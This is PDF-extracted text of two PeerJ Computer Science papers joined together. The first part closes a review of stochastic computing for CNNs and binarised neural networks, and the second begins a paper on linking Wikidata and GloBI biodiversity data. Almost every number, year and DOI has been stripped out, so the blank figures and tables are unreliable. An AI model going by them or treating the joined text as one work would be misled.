the sc and bnn come into the same conclusion that xnor gate can be used as a bipolar multiplier, as depicted in fig. a, despite different directions of development. if somehow a way to process the bnn model in stochastic mean exists, then the sc can take a free ride to the bnn’s internal logic. although bnn process information at the bitwise level in the hidden layer, the initial layer still needs to deal with input images of fixed-point binary number as shown in lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. fig. b. in most cases, alu is utilised for real number calculation, or digital signal processing unit in the case of fpga. they attempted to fuse the sc domain onto the first layer by translating image input into stochastic bitstreams and then exploiting sc logic similarity in bnn for bipolar multiplication to take advantage of the bnn logic. however, unique data pre-processing is needed so that the trained network is trained on a serialised stochastic binary image instead of the original grayscale image. the input image is converted into multiple stochastic image representations as shown in fig. c where the bitstream generation of each pixel follows the function of sng. then, the number of stochastic images generated is equal to the stochastic bit length of the data. a ‘popcount’ accumulator is implemented at the end of the layer to restore the real number before proceeding to the next threshold function, which had replaced the activation function and batch normalisation. the difference of their bnn usage compared with the general bnn is that they treated the bnn xnor gate as if it is of sc cnn stochastic logic. notably, the sc only apply on the first layer, and the rest of the hidden layer still follows bnn logics. in the end, they claimed to have % area reduction whilst only suffer . % accuracy degradation in fashion-mnist dataset classification compared with the binary first-layer bnn. they also claimed that with three stochastic image representations, sc bnn could achieve the same performance as binary bnn implementation at . times lower energy usage, which is very similar to the edt approach. they even extended the experiment with advanced cifar- images with rgb channels. by following the same image conversion principle in channel-wise, the sc bnn achieved the same accuracy as full binary bnn, proving that eliminating alu at the first bnn layer is possible. nevertheless, one possible confusion is that they could have mistaken the bnn weight information as part of the stochastic domain. the bnn weights were trained in the binary domain with images of real fixed-point value, but it is not a concern as long as the bnn weights are represented in fully quantised ‘− ’ or ‘ ’ vector regardless of the computing domain. discussion we discussed the sc cnn and bnn elements in component-wise. however, a visualisation approach is necessary to obtain the full picture of how are they exactly being stacked together as sc cnn and sc bnn, which no one had emphasised on in almost all related studies. otherwise, novel readers might be having a hard time to grasp the idea and motives behind the effort of sc development, particularly for those studies mentioned above with the mixed bag of vastly different fields of study. sc cnn and sc bnn from a holistic perspective modern computing handles the cnn computation by aggregating all values layer-by-layer until the final class output is converged. the hidden truth behind the oversimplified drawing of cnn as in fig. c is that there could have a lot of data accumulation and transfer between the processor and memory. even if modern gpus could parallelise thousands of arithmetic operations, it still takes time to buffer computed data into local memory for each feature map or layer, because it is impossible to read and write on the same memory at the same time. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. btanhbtanh a pc a pc sn bit sn bit sn sn bn snsn sn bn sn sn sn bn sn bn dense/classification layerflatten px conv  layerconv  layer px wbg array *  xnor gate conv  weight  * *  pixel sng conv  weight  * wbg array *  xnor gate *  px wbg array dense  weight  px * *  xnor gate  neurons  sc clock cycle  classes *bn = binary number *sn = stochastic number a pc btanh a pc btanh a pc a pc a pc a pc a pc btanhbtanhbtanhbtanhbtanh counter counter counter counter counter bn figure process flow in sc cnn and the internal computing domain interchange. full-size doi: . /peerjcs. /fig- conversely, sc handles the computation information in a different approach as depicted in fig. . due to the extreme parallelisation capability of the sc circuit, all of the data could be technically preloaded into local memory before the starting of the sc cycle. although stochastic stream could take hundreds or even thousands of clock cycles to complete (each clock for each stochastic bit), sc pipelined all cnn arithmetic operation from top-down. thus, all of the bits at a particular moment passed though all cnn layers at every sc clock cycle. if a clock cycle took µs, then a full-fledged sc cnn inference with -kilobit length stochastic streams could, in theory, complete the cnn computation in under ms. by then, a new full-sized image data could have been buffered asynchronously readily available for the next sc cycle. thus, in the perspective of the sc circuit, memory bandwidth bottlenecking might not be an issue. the simple computing elements in sc allow large-scale parallelisation, which is incredibly favourable to cnn hardware implementation in edge computing application. the advantage will only be highly prevalent when noise tolerance is essential at a higher clock speed in the future of computing or deployment of a big cnn model which requires larger data parallelisation. in the case of sc bnn as illustrated in fig. , the converted stochastic images could exploit the bnn xnor logic for sc, eliminating the need for alu. although the sc domain ended at the first layer, the subsequent bnn bipolar multiplication, accumulation and threshold loops do not take much computing time either, virtually single-layer pass in one or few clock cycles. given the nature of the layer-wise operation, bnn could in practice allow layer folding, that is, reusing the computer components of the previous layer by reloading weight information (mittal, ), further reducing the area and power required which are not possible on sc cnn. sc bnn also allows in-memory computation because those bit weights can be stored right next to the computing gate arrays, further improving energy efficiency by eliminating the cost of communication bandwidth. the ensemble technique on bnn could also perform as accurate as full precision dnn lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. st  layer stochastic  binarised  images …t sngs grayscale  image loop for t times, accumulate and  threshold into bnn bipolar bit loop for k layers hidden  layer final layer argmax bn sn bn bitsn bit bn *bn = binary number *sn = stochastic number *bit = bnn bit vector p o p co u n t a cc u m u la te  a n d   t h re sh o ld  [ ‐ , ] p o p co u n t binarised weights [‐ , ] c la ss e s figure process flow in sc bnn, stochastic image generation methodology and the internal com- puting domain interchange. full-size doi: . /peerjcs. /fig- table performance difference across sc and conventional binary domain. cnn model platform year method area (mm ) power (w) or energy (nj) accuracy (%) energy efficiency (images/j) or (gops/w) cpu software w . . gpu software . w . . asic sc bit (ren et al., ) . . w . , asic sc bit (li et al., a) . . w . , , lenet- asic sc dwm bit (ma et al., ) . . w . – cpu software w – . gpu software . w – . alexnet (last second layer) asic sc bit (li et al., a) . . w – , , asic binary . . mw – – asic sc mac . . mw – –custom ( x filter) asic sc dmac . . mw – – asic binary – nj . –custom (ardakani et al., ) asic integral sc – nj . – asic binary . . w – . gops/w convnet for mnist asic sc mac . . w – . gops/w asic bnn . nj –custom (hirtzlin et al., ) asic sc bnn . nj . – notes. gops, giga operations per second. (zhu, dong & su, ). thus, the area and power savings of sc bnn could be extreme, challenging the performance of sc cnn. although no standard reference exists for a fair comparison, we can compare the performance difference of sc cnn/bnn in cnn model-wise as shown in table to highlight the clear advantage of sc in cnn application. nevertheless, the year of comparable studies varies greatly, and hardware and software efficiencies had greatly improved over the last decade, thus should only be taken as a rough comparison. in lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table component-wise performance comparison of sc cnn. sc cnn/bnn components author platform/ software relative accuracy (%) area/gate count (%) power/energy saving (%) relative to integra sc ardakani et al. ( ) fpga & asic + . − . . binary computing esl canals et al. ( ) fpga − . – – binary computing apc + btanh kim, lee & choi ( a), kim, lee & choi ( b) and kim et al. ( ) synopsys design compiler − . ; − . (edt) − . . ; . (edt) binary computing apc with inverse adder li et al. ( a) synopsys design compiler – − . . normal apc sc maxpooling ren et al. ( ) synopsys design compiler − . − . . gpu computing sc relu activation li et al. ( a) synopsys design compiler − . − . . gpu computing sc normalisation li et al. ( b) synopsys design compiler − . − . . binary computing sc mac sim & lee ( ) synopsys design compiler − − . − . binary computing asica alexnet inceptionv vgg sc dmac hojabr et al. ( ) synopsys design compiler – − . mobilenet sc sigmoid activation li et al. ( a) freepdk − . − . . binary computing − . − . . binary computing – − . . unipolar sc sc quantization li et al. ( b) freepdk – − . . bipolar sc sc bnn hirtzlin et al. ( ) cadence first en- counter − . − . binary bnn notes. abinary computing asic apply to the cnn model comparison. the case of component-wise performance comparison, table could further clarify the performance number that had been mentioned in the previous section if any. conclusions the sc may still not well developed relatively speaking. still, with the trending of highly parallelised computing use case, sc might be the good old yet not-so-old idea, specifically when people are still actively researching and optimising sc circuits with the driving momentum of cnn algorithm. that being said, the fpga itself is still not widely adopted lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the programming community, let alone the sc adaptation. numerous efforts were made in the high-level cnn to fpga translation for binary domain computation (liu et al., ; noronha, salehpour & wilton, ). however, the bridging effort of sc in fpga is near to non-existence or should be said most of the sc studies lean to asic. many people are interested in offloading computationally intensive workloads such as image processing and cnn inferencing to the co-processor. thus, sc elements should be made an open-source ips and introduced into the fpga design ecosystem so that people can innovate on it. the open-sourcing design could help accelerate the sc development because researchers do not have to redesign the ip from scratch which is the major hurdle for novel development and could turn down people from being interested in sc technology. it could be the primary reason why sc cnn lacks attention, leading to a low number of comparable data as well as benchmarking. speaking of parallelism capability in sc, data bandwidth bottlenecking could be a major challenge. even though sc can have vast arrays of wbg or comparator to compare a massive amount of binary values at once, delivering massive data on time is challenging. notably, sc does require hundreds if not thousands of clock cycles to complete. thus, data transfer could be pipelined and buffered asynchronously. moreover, a tremendous amount of data needs to be ready beside the sc elements. as such, local memory element such as sram (in asic terms) or bram/flip-flop (in fpga term) limitation should be the concern. in any case, memory-centric computing design should be the direction of sc development, especially in sc cnn, where hundreds of thousands, even millions of operations could be parallelised. there are still a lot of optimisation rooms for sc implementation on fpga since most of the modern fpga consists of -input lookup tables. asic logic might not be able to translate into the fpga fabric efficiently because lookup tables are hardwired. although fpga is flexible in terms of hardware implementation, it is not as customisable as the asic. modern fpga also consists of other resources capable of performance computing such as digital signal processors or arithmetic logic awaiting to be utilised. however, those aspects could only be discovered in future research efforts. nomenclature adc analog-to-digital converter alu arithmetic logic unit apc approximate parallel counter asc analog-to-stochastic converter asic application-specific integrated circuit bnn binarised neural network btanh binary input stanh cnn convolutional neural network cpu central processing unit dnn deep neural network dwm domain-wall memory edt early decision termination lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. fa full adder fpga field-programmable gate array fpu floating-point unit fsm finite state machine gpu graphic processing unit iot internet of things lfsr linear feedback shift register mac multiplier-accumulator relu rectified linear unit rng random number generator sc stochastic computing sng stochastic number generator suc shifted unary code stanh stochastic tanh tanh hyperbolic tangent wbg weighted binary generator additional information and declarations funding this research was funded by the school of electrical and electronic engineering, universiti sains malaysia ( /pelect/ ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: school of electrical and electronic engineering, universiti sains malaysia: /p- elect/ . competing interests the authors declare there are no competing interests. author contributions • yang yang lee conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • zaini abdul halim analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: no raw data is available for literature review. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. references alaghi a, hayes jp. . survey of stochastic computing. transactions on embedded computing systems : doi . / . . alaghi a, qian w, hayes jp. . the promise and challenge of stochastic computing. ieee transactions on computer-aided design of integrated circuits and systems : – doi . /tcad. . . angizi s, fan d. . imc: energy-efficient in-memory convolver for accelerating binarized deep neural network. in: acm international conference proceeding series -july. doi . / . . ardakani a, leduc-primeau f, onizawa n, hanyu t, gross wj. . vlsi im- plementation of deep neural network using integral stochastic computing. ieee transactions on very large scale integration (vlsi) systems : – doi . /tvlsi. . . brown bd, card hc. . stochastic neural computation i: computational elements. ieee transactions on computers : – doi . / . . canals v, morro a, oliver a, alomar ml, rosselló jl. . a new stochas- tic computing methodology for efficient neural network implementation. ieee transactions on neural networks and learning systems : – doi . /tnnls. . . capra m, bussolino b, marchisio a, shafique m, masera g, martina m. . an up- dated survey of efficient hardware architectures for accelerating deep convolutional neural networks. future internet : doi . /fi . chen th, hayes jp. . design of division circuits for stochastic computing. in: proceedings of ieee computer society annual symposium on vlsi, isvlsi - september. piscataway: ieee, – doi . /isvlsi. . . chen th, ting p, hayes jp. . achieving progressive precision in stochastic comput- ing. in: ieee global conference on signal and information processing, globalsip . piscataway: ieee, – doi . /globalsip. . . chu si. . new divider design for stochastic computing. ieee transactions on circuits and systems ii: express briefs : – doi . /tcsii. . . de aguiar jm, khatri sp. . exploring the viability of stochastic computing. in: proceedings of the rd ieee international conference on computer design, iccd . piscataway: ieee, – doi . /iccd. . . fei-fei l, deng j, li k. . imagenet: a large-scale hierachical image database. journal of vision : – doi . / . . . galloway a, taylor gw, moussa m. . attacking binarized neural networks. in: th international conference on learning representations, iclr —conference track proceedings. – . hinton ge, srivastava n, krizhevsky a, sutskever i, salakhutdinov rr. . improv- ing neural networks by preventing co-adaptation of feature detectors. – arxiv preprint. arxiv: . . lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /tcad. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tvlsi. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tnnls. . http://dx.doi.org/ . /fi http://dx.doi.org/ . /isvlsi. . http://dx.doi.org/ . /globalsip. . http://dx.doi.org/ . /tcsii. . http://dx.doi.org/ . /iccd. . http://dx.doi.org/ . / . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. hirtzlin t, penkovsky b, bocquet m, klein jo, portal jm, querlioz d. . stochastic computing for hardware implementation of binarized neural networks. ieee access : – doi . /access. . . hojabr r, givaki k, tayaranian smr, esfahanian p, khonsari a, rahmati d, najafi mh. . skippynn: an embedded stochastic-computing accelerator for convo- lutional neural networks. in: proceedings—design automation conference. new york: acm, – doi . / . . ichihara h, ishii s, sunamori d, iwagaki t, inoue t. . compact and accurate stochastic circuits with shared random number sources. in: nd ieee inter- national conference on computer design, iccd . piscataway: ieee, – doi . /iccd. . . ioffe s, szegedy c. . batch normalization: accelerating deep network training by reducing internal covariate shift. proceedings of the nd international conference on machine learning : – doi . / . . . jayakumar h, raha a, kim y, sutar s, lee ws, raghunathan v. . energy-efficient system design for iot devices. in: proceedings of the asia and south pacific design automation conference, asp-dac - -january. piscataway: ieee, – doi . /aspdac. . . joe h, kim y. . novel stochastic computing for energy-efficient image processors. electronics : – doi . /electronics . kim k, kim j, yu j, seo j, lee j, choi k. . dynamic energy-accuracy trade-off using stochastic computing in deep neural networks. in: proceedings—design automation conference - -june. doi . / . . kim k, lee j, choi k. a. an energy-efficient random number generator for stochastic circuits. in: proceedings of the asia and south pacific design au- tomation conference, asp-dac - -january. new york: acm, – doi . /aspdac. . . kim k, lee j, choi k. b. approximate de-randomizer for stochastic circuits. in: isocc —international soc design conference: soc for internet of everything (ioe). – doi . /isocc. . . li z, li j, ren a, cai r, ding c, qian x, draper j, yuan b, tang j, qiu q, wang y. a. heif: highly efficient stochastic computing-based inference framework for deep neural networks. ieee transactions on computer-aided design of integrated circuits and systems : – doi . /tcad. . . li b, najafi mh, yuan b, lilja dj. b. quantized neural networks with new stochas- tic multipliers. in: proceedings—international symposium on quality electronic design, isqed -march. – doi . /isqed. . . li b, qin y, yuan b, lilja dj. a. neural network classifiers using stochastic com- puting with a hardware-oriented approximate activation function. in: proceedings— th ieee international conference on computer design, iccd . piscataway: ieee, – doi . /iccd. . . li j, yuan z, li z, ding c, ren a, qiu q, draper j, wang y. b. hardware-driven nonlinear activation for stochastic computing based deep convolutional neural lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /access. . http://dx.doi.org/ . / . http://dx.doi.org/ . /iccd. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /aspdac. . http://dx.doi.org/ . /electronics http://dx.doi.org/ . / . http://dx.doi.org/ . /aspdac. . http://dx.doi.org/ . /isocc. . http://dx.doi.org/ . /tcad. . http://dx.doi.org/ . /isqed. . http://dx.doi.org/ . /iccd. . http://dx.doi.org/ . /peerj-cs. networks. in: proceedings of the international joint conference on neural networks - may. new york: acm, – doi . /ijcnn. . . li j, yuan z, li z, ren a, ding c, draper j, nazarian s, qiu q, yuan b, wang y. c. normalization and dropout for stochastic computing-based deep convolutional neural networks. integration : – doi . /j.vlsi. . . . liew ss, khalil-hani m, ahmad radzi s, bakhteri r. . gender classification: a convolutional neural network approach. turkish journal of electrical engineering and computer sciences : – doi . /elk- - . liu z, dou y, jiang j, xu j. . automatic code generation of convolutional neu- ral networks in fpga implementation. in: proceedings of the international conference on field-programmable technology, fpt . piscataway: ieee, – doi . /fpt. . . ma x, zhang y, yuan g, ren a, li z, han j, hu j, wang y. . an area and en- ergy efficient design of domain-wall memory-based deep convolutional neural networks using stochastic computing. in: proceedings—international symposium on quality electronic design, isqed -march. piscataway: ieee, – doi . /isqed. . . mittal s. . a survey of fpga-based accelerators for convolutional neural networks. neural computing and applications : – doi . /s - - - . najafi mh, li p, lilja dj, qian w, bazargan k, riedel m. . a reconfigurable architecture with sequential logic-based stochastic computing. acm journal on emerging technologies in computing systems : doi . / . naveen s, kounte mr. . key technologies and challenges in iot edge computing. in: third international conference on i-smac (iot in social, mobile, analytics and cloud) (i-smac). piscataway: ieee, – doi . /i-smac . . . noronha dh, salehpour b, wilton sje. . leflow: enabling flexible fpga high-level synthesis of tensorflow deep neural networks. in: th international workshop on fpgas for software programmers, fsp , co-located with international conference on field programmable logic and applications, fpl . – . nurvitadhi e, sheffield d, sim j, mishra a, venkatesh g, marr d. . accelerating binarized neural networks: comparison of fpga, cpu, gpu, and asic. in: proceedings of the international conference on field-programmable technology, fpt . piscataway: ieee, – doi . /fpt. . . ren a, li z, ding c, qiu q, wang y, li j, qian x, yuan b. . sc-dcnn: highly-scalable deep convolutional neural network using stochastic comput- ing. in: international conference on architectural support for programming lan- guages and operating systems—asplos part f . new york: acm, – doi . / . . ren a, li z, wang y, qiu q, yuan b. . designing reconfigurable large-scale deep learning systems using stochastic computing. in: ieee international conference on rebooting computing, icrc —conference proceedings. piscataway: ieee, doi . /icrc. . . lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijcnn. . http://dx.doi.org/ . /j.vlsi. . . http://dx.doi.org/ . /elk- - http://dx.doi.org/ . /fpt. . http://dx.doi.org/ . /isqed. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /i-smac . . http://dx.doi.org/ . /fpt. . http://dx.doi.org/ . / . http://dx.doi.org/ . /icrc. . http://dx.doi.org/ . /peerj-cs. salehi sa. . low-cost stochastic number generators for stochastic computing. ieee transactions on very large scale integration (vlsi) systems : – doi . /tvlsi. . . sim h, lee j. . a new stochastic computing multiplier with application to deep convolutional neural networks. in: proceedings—design automation conference part . new york: acm, – doi . / . . sim h, nguyen d, lee j, choi k. . scalable stochastic-computing accelera- tor for convolutional neural networks. in: proceedings of the asia and south pacific design automation conference, asp-dac. piscataway: ieee, – doi . /aspdac. . . simons t, lee dj. . a review of binarized neural networks. electronics : doi . /electronics . xie y, liao s, yuan b, wang y, wang z. . fully-parallel area-efficient deep neural network design using stochastic computing. . piscataway: ieee, – doi . /tcsii. . . yang m, li b, lilja dj, yuan b, qian w. . towards theoretical cost limit of stochas- tic number generators for stochastic computing. in: proceedings of ieee computer society annual symposium on vlsi, isvlsi -july. piscataway: ieee, – doi . /isvlsi. . . yu j, kim k, lee j, choi k. . accurate and efficient stochastic computing hard- ware for convolutional neural networks. in: proceedings - th ieee interna- tional conference on computer design, iccd . piscataway: ieee, – doi . /iccd. . . zhakatayev a, lee s, sim h, lee j. . sign-magnitude sc: getting x accuracy for free in stochastic computing for deep neural networks. in: proceedings—design automa- tion conference part f . new york: acm, – doi . / . . zhang y, zhang x, song j, wang y, huang r, wang r. . parallel convolutional neural network (cnn) accelerators based on stochastic computing. in: ieee workshop on signal processing systems, sips: design and implementation. piscataway: ieee, – doi . /sips . . . zhu s, dong x, su h. . binary ensemble neural network: more bits per network or more networks per bit? in: proceedings of the ieee computer society conference on computer vision and pattern recognition -june. piscataway: ieee, – doi . /cvpr. . . lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tvlsi. . http://dx.doi.org/ . / . http://dx.doi.org/ . /aspdac. . http://dx.doi.org/ . /electronics http://dx.doi.org/ . /tcsii. . http://dx.doi.org/ . /isvlsi. . http://dx.doi.org/ . /iccd. . http://dx.doi.org/ . / . http://dx.doi.org/ . /sips . . http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /peerj-cs. submitted may accepted august published september corresponding author anne e. thessen, annethessen@gmail.com academic editor alessandro frigeri additional information and declarations can be found on page doi . /peerj-cs. copyright thessen et al. distributed under creative commons cc-by . open access gb in minutes: a case for linking major biodiversity databases using an open socio-technical infrastructure and a pragmatic, cross-institutional collaboration anne e. thessen , , jorrit h. poelen , matthew collins and jen hammock ronin institute for independent scholarship, montclair, nj, usa independent consultant, oakland, ca, usa university of florida, gainsville, fl, usa national museum of natural history, washington, dc, usa oregon state university, corvallis, or, usa abstract biodiversity information is made available through numerous databases that each have their own data models, web services, and data types. combining data across databases leads to new insights, but is not easy because each database uses its own system of identifiers. in the absence of stable and interoperable identifiers, databases are often linked using taxonomic names. this labor intensive, error prone, and lengthy process relies on accessible versions of nomenclatural authorities and fuzzy-matching algorithms. to approach the challenge of linking diverse data, more than technology is needed. new social collaborations like the global unified open data architecture (guoda) that combines skills from diverse groups of computer engineers from idigbio, server resources from the advanced computing and information systems (acis) lab, global-scale data presentation from eol, and independent developers and researchers are what is needed to make concrete progress on finding relationships between biodiversity datasets. this paper will discuss a technical solution developed by the guoda collaboration for faster linking across databases with a use case linking wikidata and the global biotic interactions database (globi). the guoda infrastructure is a -node, high performance computing cluster made up of about threads with tb of storage and gb memory. using guoda, gb of compressed json from wikidata was processed and linked to globi in about – min. instead of comparing name strings or relying on a single identifier, wikidata and globi were linked by comparing graphs of biodiversity identifiers external to each system. this method resulted in adding , wikidata links in globi, an increase of . % of all outgoing name links in globi. wikidata and globi were compared to open tree of life reference taxonomy to examine consistency and coverage. the process of parsing wikidata, open tree of life reference taxonomy and globi archives and calculating consistency metrics was done in minutes on the guoda platform. as a model collaboration, guoda has the potential to revolutionize biodiversity science by bringing diverse technically minded people together with high performance computing how to cite this article thessen et al. ( ), gb in minutes: a case for linking major biodiversity databases using an open socio- technical infrastructure and a pragmatic, cross-institutional collaboration. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:annethessen@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. resources that are accessible from a laptop or desktop. however, participating in such a collaboration still requires basic programming skills. subjects bioinformatics, databases keywords biodiversity, collaboration, identifiers, wikidata, graph, linking introduction biodiversity databases provide global access to information about species via the web. these databases contain information as varied as observation records, text descriptions, images, maps, genetic sequences, phylogenetic trees, and trait data (table ). all of these data become much more useful if they can be linked. many biodiversity databases share information with each other (bingham et al., ), but creating the links can be very difficult for several reasons including the size of the databases, the heterogeneous nature of the data, and the heterogeneous nature of the identifiers used by the different resources (page, ). the more popular methods for linking biodiversity databases include taxonomic names, lsid (life sciences identifier), and doi (digital object identifier). the encyclopedia of life uses taxonomic names to automatically aggregate data from hundreds of providers (parr et al., ). bionames links data using lsid, doi, handles, bibliographic citations, and taxonomic names (page, ). the iphylo linkout service mapped identifiers used by the ncbi taxonomy database (which provides the taxonomic backbone for genbank) to wikipedia pages using taxonomic names, including synonyms (page, ). tbmap provides links from treebase across several taxonomic databases, such as itis and ncbi (page, ). this mapping was also achieved using taxonomic names, but in some cases genbank accession numbers and museum specimen codes were available for supplement. the use of taxonomic names to aggregate data can lead to errors and requires significant a priori knowledge either in the form of curators or an authoritative nomenclature. many databases expose their own internal identifiers, such as the worms aphia id, so others can link their data to those resources within their own systems, often by providing a url. databases like worms provide web services that allow users to look up an identifier for a taxon in question, one at a time. while this makes linking easier, it is still difficult to scale across all databases. for example, a list of all the taxon identifiers in eol is mb compressed. no system of identifiers is universal across biodiversity databases and none of them are easy to implement at scale. while the data would be much more useful if linked, there is a lack of tools for linking data across databases at scale. most mappings are done at great expense and then are made available as a separate file or incorporated into the resources themselves. linkout, bionames, gbif, and eol take more than a day to link across their entire body of aggregated content. this paper discusses links made between globi and wikidata (wd) in min using guoda, a high performance computing system available for analysis of large biodiversity data sets. thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table selected biodiversity databases and their size. database data quantity (jan ) size (compressed) gbif , , occurrence records gb catalogue of life/itis . million taxa . gb globi , , interactions mb idigbio , , specimen records . gb genbank , , sequences tb biodiversity heritage library , , pages . gb worms , marine species mb opentree , , taxa and , trees mb eol traitbank over million records gb uncompressed eol , , data objects (may ) tb uncompressed wikidata , , data items gb methods description of resources guoda following an idigbio hack-a-thon in june , guoda was created as a pragmatic way to compute over multiple large biodiversity databases in a mutually beneficial collaboration between idigbio, eol, kew garden, and independent developers. catalyzed by various presentations at conferences, hardware provided by acis, + meetings, and several prototypes (e.g., http://effechecka.org, https://gimmefreshdata.github.io), a general access biodiversity data integration and analysis environment was created. this environment, with the aggregated experience and perspectives of all the collaborators, was used to produce the results of this paper. housed at the acis lab at the university of florida, the guoda infrastructure consists of ibm hs blades each with cores, gb of memory, and tb of storage each. this makes a total of threads, gb of memory and tb of disk space available for processing jobs using apache spark (fig. ; zaharia et al., ). the cluster is managed under apache mesos (hindman et al., ) which is a distributed scheduling system for periodic jobs. for long running processes, such as web apis or databases, the marathon (https://github.com/mesosphere/marathon) framework is run within mesos. marathon facilitates running always-up services with monitoring, automatic deployment of code, re-scaling to multiple nodes, and other management features. mesos is responsible for accepting requests to start spark frameworks, processes which do the actual computation and may span multiple servers, and allocation of resources requested by the framework. hadoop hdfs (shvachko et al., ) is installed outside of mesos directly on all nodes of the cluster and provides redundant parallel shared storage to all nodes as well as the jupyter notebook (kluyver et al., ) server that provides a programming interface to end users. each node has tb of local disk storage for a total of about . tb of usable storage space for data files in apache parquet format. spark is aware of the placement of data on an hdfs cluster and will divide processing among nodes in a way that prefers to read and write data that is local to the node to minimize network traffic. thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://effechecka.org https://gimmefreshdata.github.io) https://github.com/mesosphere/marathon http://dx.doi.org/ . /peerj-cs. figure guoda infrastructure. data from biodiversity databases is loaded into guoda as parquet files (storage). when a user working in a jupyter notebook (front-end server) triggers a job interactively or via github and jenkins, the data are analyzed using apache spark (compute cluster). this infrastruc- ture allows a user working from a laptop or desktop to compute over multiple biodiversity databases at once. all logos are provided by the organizations they represent and are used with permission. full-size doi: . /peerjcs. /fig- wikidata wikidata (wd) is a free and open knowledge base that provides structured data for wikimedia projects (http://www.wikidata.org; vrandečić & krötzsch, ). similar to wikipedia, anyone can read or edit the resource. information, including links to other resources, can be added to wikidata using bots and batch imports through their data import hub (https://www.wikidata.org/wiki/wikidata:data_import_hub). wikidata information about taxa can be conceptualized as a graph linking related taxa to each other and identifiers from other databases to the taxa they represent (fig. ). every taxon in wikidata is issued a wikidata identifier. while a public wikidata sparql endpoint and associated tools (voß, ) exist, these apis are not suitable for batch processing. for example, when attempting to retrieve all taxa using the public sparql endpoint, a query timeout error was reported. in addition, the apis are expected to return different results over time, so reproducing results is difficult if not impossible. this is why we used a json archive to access wikidata (wikidata, ). globi globi is a database of biotic interactions recorded as organism_ :has_relationship: organism_ (poelen, simons & mungall, ) per individual interaction observation or claim. globi uses a combination of web apis, taxon archives, and name correction/parsing methods in an attempt to link names from species interaction datasets to existing sources. spatial, temporal, and taxonomic coverage in globi is sparse and unevenly distributed (see eltonian shortfall, hortal et al., ), with spatial concentrations in europe and north america and taxonomically concentrated in arthropods, fungi, and plants. only % of thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://www.wikidata.org https://www.wikidata.org/wiki/wikidata:data_import_hub http://dx.doi.org/ . /peerj-cs. figure frequency of wikidata taxa linked to biodiversity databases. this graph shows the propor- tion of the approximately . million wikidata taxa with zero, one, two, etc. links to external biodiversity databases (ncbi, itis, gbif, eol, fishbase, index fungorum and inaturalist). the majority of wikidata taxa had at least two links. a little more than % of wikidata taxa had no links to external biodiversity databases. full-size doi: . /peerjcs. /fig- taxa in itis are also in globi. a detailed technical description of the globi data model and services has been published elsewhere (poelen, simons & mungall, ). globi maintains a graph of related taxa and their identifiers from different databases (poelen, simons & mungall, ). globi does not introduce its own taxon ids. instead, it records how names were mapped from a source name into an external taxonomic database using a taxon graph (see https://globalbioticinteractions.org/references). we used globi taxon graph v . . (poelen, b). this taxon graph links names and identifiers hierarchically and across resources. open tree of life reference taxonomy to assess taxonomic id coverage, the taxa in wikidata and globi were compared to open tree of life reference taxonomy (ott . ; http://files.opentreeoflife.org/ott/ott . /ott . .tgz; rees & cranston, ). ott was built using an automated algorithm with informed choices to aggregate and link existing naming authorities into a reasonably comprehensive, artificial, taxonomy. ott contains , , external links for , , taxa aggregated and linked over five authorities (i.e., gbif, if, silva, worms, ncbi). linking wikidata and globi both wikidata and globi have taxon graphs that map to identifiers from external databases (e.g., ncbi, itis, gbif, eol, index fungorum (if), fishbase and worms). a wikidata dump was loaded into guoda and processed to extract taxon items (about . million) thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://globalbioticinteractions.org/references http://files.opentreeoflife.org/ott/ott . /ott . .tgz http://files.opentreeoflife.org/ott/ott . /ott . .tgz http://dx.doi.org/ . /peerj-cs. figure mapping taxon graphs across resources. both globi and wikidata contain hierarchical taxon graphs with each taxon having a ‘‘star’’ of external identifiers. the taxa are mapped across these resources by comparing the portion of the graph with the external identifiers between nodes. in this example, the names and identifiers match perfectly, so a relationship between panthera leo in globi and panthera leo in wikidata is inferred. full-size doi: . /peerjcs. /fig- and their links to ncbi, itis, gbif, eol, if, fishbase and worms. this was the wikidata taxon graph. this taxon graph was loaded into a lookup table where each row contained an ncbi, itis, 